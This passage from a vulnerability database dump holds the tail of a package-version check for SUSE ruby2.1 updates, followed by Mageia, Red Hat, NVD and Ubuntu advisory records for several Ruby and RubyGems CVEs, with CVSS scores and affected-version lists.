+ sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-debuginfo-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"yast2-ruby-bindings-debugsource-3.1.53-9.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libruby2_1-2_1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-debuginfo-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-debugsource-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-stdlib-2.1.9-19.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-19.3.2\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2023-08-07T08:46:09", "description": "It was discovered that Ruby Net::SMTP incorrectly handled CRLF sequences. A remote attacker could possibly use this issue to inject SMTP commands. (CVE-2015-9096) Marcin Noga discovered that Ruby incorrectly handled certain arguments in a TclTkIp class method. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2337) It was discovered that Ruby Fiddle::Function.new incorrectly handled certain arguments. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-20T09:10:44", "type": "mageia", "title": "Updated ruby packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9096", "CVE-2016-2337", "CVE-2016-2339"], "modified": "2017-08-20T09:10:44", "id": "MGASA-2017-0290", "href": "https://advisories.mageia.org/MGASA-2017-0290.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-21T21:13:51", "description": "Updated ruby-RubyGems package fixes security vulnerability: RubyGems does not validate the hostname when fetching gems or making API request, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack\" (CVE-2015-3900). \n", "cvss3": {}, "published": "2015-09-08T17:55:59", "type": "mageia", "title": "Updated ruby-RubyGems packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-09-08T17:55:59", "id": "MGASA-2015-0345", "href": "https://advisories.mageia.org/MGASA-2015-0345.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhatcve": [{"lastseen": "2021-09-02T22:54:13", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-12T14:50:43", "type": "redhatcve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2020-04-08T22:05:25", "id": "RH:CVE-2016-2339", "href": "https://access.redhat.com/security/cve/cve-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:46", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-12T14:50:37", "type": "redhatcve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2020-04-08T22:04:23", "id": "RH:CVE-2016-2337", "href": "https://access.redhat.com/security/cve/cve-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-03T14:29:39", "description": "An exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "cve", "title": "CVE-2016-2339", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2018-07-15T01:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.2.2"], "id": "CVE-2016-2339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:29:41", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T21:59:00", "type": "cve", "title": "CVE-2016-2337", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2018-08-28T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.2.2"], "id": "CVE-2016-2337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T17:13:22", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a \"DNS hijack attack.\"", "cvss3": {}, "published": "2015-06-24T14:59:00", "type": "cve", "title": "CVE-2015-3900", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.1.3", "cpe:/a:rubygems:rubygems:2.4.2", "cpe:/a:rubygems:rubygems:2.4.6", "cpe:/a:rubygems:rubygems:2.0.6", "cpe:/a:rubygems:rubygems:2.2.2", "cpe:/a:rubygems:rubygems:2.0.15", "cpe:/a:rubygems:rubygems:2.0.12", "cpe:/a:ruby-lang:ruby:1.9.1", "cpe:/a:rubygems:rubygems:2.0.13", "cpe:/a:rubygems:rubygems:2.0.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3", "cpe:/a:rubygems:rubygems:2.4.0", "cpe:/a:rubygems:rubygems:2.0.10", "cpe:/a:rubygems:rubygems:2.0.11", "cpe:/a:ruby-lang:ruby:2.1.5", "cpe:/a:rubygems:rubygems:2.0.14", "cpe:/a:rubygems:rubygems:2.2.1", "cpe:/a:ruby-lang:ruby:2.1", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:rubygems:rubygems:2.2.3", "cpe:/a:rubygems:rubygems:2.4.1", "cpe:/a:rubygems:rubygems:2.0.2", "cpe:/a:rubygems:rubygems:2.0.7", "cpe:/a:ruby-lang:ruby:2.1.2", "cpe:/a:rubygems:rubygems:2.0.5", "cpe:/a:ruby-lang:ruby:2.1.1", "cpe:/a:rubygems:rubygems:2.0.4", "cpe:/a:rubygems:rubygems:2.0.8", "cpe:/a:ruby-lang:ruby:1.9.3", "cpe:/a:rubygems:rubygems:2.4.4", "cpe:/a:rubygems:rubygems:2.0.3", "cpe:/a:ruby-lang:ruby:2.1.4", "cpe:/a:ruby-lang:ruby:1.9", "cpe:/a:ruby-lang:ruby:2.0.0", "cpe:/a:rubygems:rubygems:2.0.1", "cpe:/a:ruby-lang:ruby:1.9.2", "cpe:/a:rubygems:rubygems:2.4.3", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:rubygems:rubygems:2.0.9", "cpe:/a:rubygems:rubygems:2.2.0", "cpe:/a:rubygems:rubygems:2.4.5"], "id": "CVE-2015-3900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rubygems:rubygems:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1:-:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.6:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-16T21:10:38", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8 does not validate the hostname when fetching gems or making API requests, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record with a domain that is suffixed with the original domain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists because to an incomplete fix for CVE-2015-3900.", "cvss3": {}, "published": "2015-08-25T17:59:00", "type": "cve", "title": "CVE-2015-4020", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:rubygems:rubygems:2.4.1", "cpe:/a:rubygems:rubygems:2.0.7", "cpe:/a:rubygems:rubygems:2.0.9", "cpe:/a:rubygems:rubygems:2.0.10", "cpe:/a:rubygems:rubygems:2.2.4", "cpe:/a:rubygems:rubygems:2.0.13", "cpe:/a:rubygems:rubygems:2.4.4", "cpe:/a:rubygems:rubygems:2.4.2", "cpe:/a:rubygems:rubygems:2.2.0", "cpe:/a:rubygems:rubygems:2.2.2", "cpe:/a:rubygems:rubygems:2.0.1", "cpe:/a:rubygems:rubygems:2.0.12", "cpe:/a:rubygems:rubygems:2.0.11", "cpe:/a:rubygems:rubygems:2.4.5", "cpe:/a:rubygems:rubygems:2.4.7", "cpe:/a:rubygems:rubygems:2.0.2", "cpe:/a:rubygems:rubygems:2.0.4", "cpe:/a:rubygems:rubygems:2.2.3", "cpe:/a:rubygems:rubygems:2.0.8", "cpe:/a:rubygems:rubygems:2.0.6", "cpe:/a:rubygems:rubygems:2.0.14", "cpe:/a:rubygems:rubygems:2.0.3", "cpe:/a:rubygems:rubygems:2.4.3", "cpe:/o:oracle:solaris:11.3", "cpe:/a:rubygems:rubygems:2.0.15", "cpe:/a:rubygems:rubygems:2.2.1", "cpe:/a:rubygems:rubygems:2.4.0", "cpe:/a:rubygems:rubygems:2.0.5", "cpe:/a:rubygems:rubygems:2.4.6", "cpe:/a:rubygems:rubygems:2.0.0", "cpe:/a:rubygems:rubygems:2.0.16"], "id": "CVE-2015-4020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:rubygems:rubygems:2.0.0:preview2.1:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:preview2.2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-28T14:34:03", "description": "An exploitable heap overflow vulnerability exists in the\nFiddle::Function.new \"initialize\" function functionality of Ruby. In\nFiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is\nmade based on args array length. Specially constructed object passed as\nelement of args array can increase this array size after mentioned\nallocation and cause heap overflow.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851161>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.3.0 and later not affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2017-01-06T00:00:00", "id": "UB:CVE-2016-2339", "href": "https://ubuntu.com/security/CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:34:04", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker\npassing different type of object than String as \"retval\" argument can cause\narbitrary code execution.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851161>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.3.0 and later not affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 